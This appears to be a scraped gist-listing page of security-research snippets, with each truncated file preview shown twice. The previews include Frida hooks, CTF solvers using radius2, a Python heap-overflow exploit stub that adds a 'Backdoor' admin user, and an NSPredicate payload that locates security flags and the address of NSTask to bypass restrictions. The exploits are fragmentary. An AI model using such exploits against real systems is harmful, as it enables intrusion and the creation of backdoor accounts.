aemmitt-ns

## svc_hook.js
const module = Process.getModuleByName("app_name");
const syscallbytes = "011000d4c0035fd6" // svc 0x80; ret;

Process.setExceptionHandler((e) => {
    if (e.type == "breakpoint") {
        // do stuff here
        e.context.pc = e.context.pc.add(4); // advance to after bp
        return true;
    } else {
        return false;

## asmpwn.py
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8  = lambda x: struct.pack(">b", x)

# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
    global socks # python closes out of scope sockets
    port = 3211  # port is hardcoded in the binary
    usernm = username.encode()

## ida.rs
use radius2::{Radius, RadiusOption, State, vc};

fn main() {
    let options = [RadiusOption::SimAll(true)];
    let mut radius = Radius::new_with_options(Some("challenge"), &options);

    let mut state = radius.callsym_state("main");
    let flag = state.symbolic_value("flag", 8*0x18);
    state.constrain_bytes(&flag, "[ -~]");
    radius.set_argv_env(&mut state, &[vc(0), flag.clone()], &[]);

## restricted.m
// dump classes and selectors forbidden in NSPredicates
// `cc -framework Foundation -o restricted restricted.m`
#import <Foundation/Foundation.h>
#import <dlfcn.h>

int main() {
    void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
    NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
    NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
    NSLog(@"Restricted Selectors: %@", RestrictedSelectors());

## funtime.js

const typeMap = {
    "c": "char",
    "i": "int",
    "s": "short",
    "l": "long",
    "q": "long long",
    "C": "unsigned char",
    "I": "unsigned int",
    "S": "unsigned short",

## .radare2rc
"$c=?e ------------------------------------ registers -----------------------------------;?e;dr=;?e;?e ------------------------------------ disassem ------------------------------------;?e;pdi 8;?e;?e ------------------------------------ stack ---------------------------------------;?e;pxr 128@SP;?e;?e ----------------------------------------------------------------------------------;"
"$ds=ds;$c"
"$dc=dc;$c"

## quinefuck.m
// yields brainfuck when quined
char *h = "++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]"
  ">>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++."; // -> Hello World!
#import <Foundation/Foundation.h>
int main(int argc, char *argv[]) {
  NSString *program = [NSString stringWithUTF8String: argc > 1 ? argv[1] : h];
  NSMutableArray *prog = [NSMutableArray array]; // make the program into an array cuz its easier
  for (int i = 0; i < program.length; i++) {
    NSString *c = [program substringWithRange: NSMakeRange(i, 1)];
    if ([@".,<>-+[]" rangeOfString: c].location != NSNotFound) [prog addObject: c];

## unplugged_apps.json
[
  {
    "applicationId": "com.unplugged.antivirus",
    "applicationName": "UP Antivirus",
    "applicationType": "TOOLS",
    "description": "Keep your device clean from malware and viruses in realtime",
    "versionName": "2.22.9",
    "versionCode": 84,
    "privacyRating": 5,
    "iconUrl": "https://up-apps-demo.s3.eu-west-1.amazonaws.com/antivirus/icon/logo.png",

## nspredpayload.m
NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast to get nice error in syslog for debugging
    // use format string to read the address of _NSPredicateUtilities ( #self() ), theres prolly a better way
    "$_NSPredicateUtilities    := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue,"
    "$_predicateSecurityFlags  := $_NSPredicateUtilities + 0x188c,"      // address of _predicateSecurityFlags
    "$_predicateSecurityOnce   := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce
    "$forbiddenClassesLength   := $_predicateSecurityFlags + 0x63a334,"  // address of length field for array of forbidden classes
    "$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4,"  // address of length field for array of forbidden selectors

    "$NSTask := $_NSPredicateUtilities + 0x637860," // address of NSTask class
    "$NSPipe := $NSTask - 0x41a0,"                  // address of NSPipe class

## main.rs
use radius2::{Radius, State, Value, vc};

// output:
// FLAG: mirror_mirror_on_the_wall_whos_the_ugliest_handler_of_them_all?!
// target/release/ollvm  0.92s user 0.04s system 99% cpu 0.964 total

const HASHES:[u64; 8] = [
    0x875cd4f2e18f8fc4, 0xbb093e17e5d3fa42, 0xada5dd034aae16b4, 0x97322728fea51225,
    0x4124799d72188d0d, 0x2b3e3fbbb4d44981, 0xdfcac668321e4daa, 0xeac2137a35c8923a
];
	const module = Process.getModuleByName("app_name");
	const syscallbytes = "011000d4c0035fd6" // svc 0x80; ret;

	Process.setExceptionHandler((e) => {
	if (e.type == "breakpoint") {
	// do stuff here
	e.context.pc = e.context.pc.add(4); // advance to after bp
	return true;
	} else {
	return false;
	import socket, struct, sys
	p32 = lambda x: struct.pack(">I", x)
	p16 = lambda x: struct.pack(">h", x)
	p8 = lambda x: struct.pack(">b", x)

	# ASMP heap overflow exploit creates new applianceAdmin user
	def exploit(hostname, username="Backdoor", password="Backdoor"):
	global socks # python closes out of scope sockets
	port = 3211 # port is hardcoded in the binary
	usernm = username.encode()
	use radius2::{Radius, RadiusOption, State, vc};

	fn main() {
	let options = [RadiusOption::SimAll(true)];
	let mut radius = Radius::new_with_options(Some("challenge"), &options);

	let mut state = radius.callsym_state("main");
	let flag = state.symbolic_value("flag", 8*0x18);
	state.constrain_bytes(&flag, "[ -~]");
	radius.set_argv_env(&mut state, &[vc(0), flag.clone()], &[]);
	// dump classes and selectors forbidden in NSPredicates
	// `cc -framework Foundation -o restricted restricted.m`
	#import <Foundation/Foundation.h>
	#import <dlfcn.h>

	int main() {
	void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
	NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
	NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
	NSLog(@"Restricted Selectors: %@", RestrictedSelectors());

	const typeMap = {
	"c": "char",
	"i": "int",
	"s": "short",
	"l": "long",
	"q": "long long",
	"C": "unsigned char",
	"I": "unsigned int",
	"S": "unsigned short",
	"$c=?e ------------------------------------ registers -----------------------------------;?e;dr=;?e;?e ------------------------------------ disassem ------------------------------------;?e;pdi 8;?e;?e ------------------------------------ stack ---------------------------------------;?e;pxr 128@SP;?e;?e ----------------------------------------------------------------------------------;"
	"$ds=ds;$c"
	"$dc=dc;$c"
	// yields brainfuck when quined
	char *h = "++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]"
	">>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++."; // -> Hello World!
	#import <Foundation/Foundation.h>
	int main(int argc, char *argv[]) {
	NSString *program = [NSString stringWithUTF8String: argc > 1 ? argv[1] : h];
	NSMutableArray *prog = [NSMutableArray array]; // make the program into an array cuz its easier
	for (int i = 0; i < program.length; i++) {
	NSString *c = [program substringWithRange: NSMakeRange(i, 1)];
	if ([@".,<>-+[]" rangeOfString: c].location != NSNotFound) [prog addObject: c];
	[
	{
	"applicationId": "com.unplugged.antivirus",
	"applicationName": "UP Antivirus",
	"applicationType": "TOOLS",
	"description": "Keep your device clean from malware and viruses in realtime",
	"versionName": "2.22.9",
	"versionCode": 84,
	"privacyRating": 5,
	"iconUrl": "https://up-apps-demo.s3.eu-west-1.amazonaws.com/antivirus/icon/logo.png",
	NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast to get nice error in syslog for debugging
	// use format string to read the address of _NSPredicateUtilities ( #self() ), theres prolly a better way
	"$_NSPredicateUtilities := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue,"
	"$_predicateSecurityFlags := $_NSPredicateUtilities + 0x188c," // address of _predicateSecurityFlags
	"$_predicateSecurityOnce := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce
	"$forbiddenClassesLength := $_predicateSecurityFlags + 0x63a334," // address of length field for array of forbidden classes
	"$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4," // address of length field for array of forbidden selectors

	"$NSTask := $_NSPredicateUtilities + 0x637860," // address of NSTask class
	"$NSPipe := $NSTask - 0x41a0," // address of NSPipe class
	use radius2::{Radius, State, Value, vc};

	// output:
	// FLAG: mirror_mirror_on_the_wall_whos_the_ugliest_handler_of_them_all?!
	// target/release/ollvm 0.92s user 0.04s system 99% cpu 0.964 total

	const HASHES:[u64; 8] = [
	0x875cd4f2e18f8fc4, 0xbb093e17e5d3fa42, 0xada5dd034aae16b4, 0x97322728fea51225,
	0x4124799d72188d0d, 0x2b3e3fbbb4d44981, 0xdfcac668321e4daa, 0xeac2137a35c8923a
	];